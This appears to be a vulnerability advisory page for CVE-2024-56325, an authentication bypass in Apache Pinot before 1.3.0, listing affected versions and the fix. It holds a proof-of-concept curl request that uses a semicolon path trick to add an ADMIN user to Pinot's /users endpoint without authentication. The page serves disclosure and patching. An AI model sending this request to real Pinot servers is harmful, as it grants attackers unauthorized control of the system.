First published: Thu Mar 27 2025(Updated: )
Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
Credit: security@apache.org
Affected Software | Affected Version | How to fix |
---|---|---|
Apache Pinot | ||
maven/org.apache.pinot:pinot | <1.3.0 | 1.3.0 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
CVE-2024-56325 is considered a critical vulnerability due to its potential for authentication bypass.
To fix CVE-2024-56325, ensure that all paths contain the necessary authentication checks regardless of URL structure.
CVE-2024-56325 affects Apache Pinot and may impact any deployments running this software.
CVE-2024-56325 can be exploited to bypass authentication, allowing unauthorized access to sensitive resources.
Yes, CVE-2024-56325 has been publicly disclosed and is documented in security advisories related to Apache Pinot.